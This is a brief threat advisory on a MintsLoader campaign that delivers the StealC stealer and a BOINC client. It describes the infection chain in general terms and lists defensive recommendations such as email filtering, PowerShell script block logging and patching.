Threat Overview

The eSentire Threat Response Unit has identified a sophisticated malware campaign involving MintsLoader, a PowerShell-based malware loader, targeting organizations in the US and Europe. This report provides insights into the tactics, techniques, procedures (TTPs), and recommendations to mitigate this ongoing threat.

Threat Actor Group:

Unknown at this time.

Report Summary:

The MintsLoader campaign delivers payloads such as Stealc (an information stealer) and BOINC client using a Domain Generation Algorithm (DGA) and anti-VM techniques to evade detection. The infection process begins with a spam email containing a malicious link that downloads a JScript file, ultimately executing PowerShell commands to retrieve and launch the malware stages. StealC targets sensitive data from browsers, applications, and crypto-wallets.

Industries Affected:

electricity, Oil & Gas, Legal Services.

Confidence Level: High (100)

Reliability of the Report: 

Usually reliable

Threat TTPs:

• Spam emails with malicious links

• JScript file downloads

• PowerShell commands for malware retrieval and execution

• DGA and anti-VM techniques

• Information stealing

External References:

https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery

https://otx.alienvault.com/pulse/678e2ed0691dbaf790bf355c

Recommendations:

1. Email Filtering: Implement robust email filtering to block suspicious emails and attachments.

2. Employee Training: Train employees to recognize phishing attempts and avoid clicking on unknown links or downloading unknown files.

3. Endpoint Security: Enhance endpoint security solutions and keep them up-to-date to better detect and block malicious files.

4. PowerShell Script Block Logging: Enable PowerShell script block logging to monitor and detect suspicious commands.

5. Regular Patch Management: Ensure timely patch management to protect against known vulnerabilities exploited by malware like MintsLoader.